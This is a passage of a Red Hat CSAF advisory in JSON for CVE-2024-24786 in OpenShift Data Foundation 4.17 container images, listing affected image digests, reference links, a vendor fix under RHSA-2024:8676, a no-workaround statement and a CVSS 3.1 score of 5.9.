"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24786"
},
{
"category": "external",
"summary": "RHBZ#2268046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24786"
},
{
"category": "external",
"summary": "https://go.dev/cl/569356",
"url": "https://go.dev/cl/569356"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/",
"url": "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-2611",
"url": "https://pkg.go.dev/vuln/GO-2024-2611"
}
],
"release_date": "2024-03-05T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
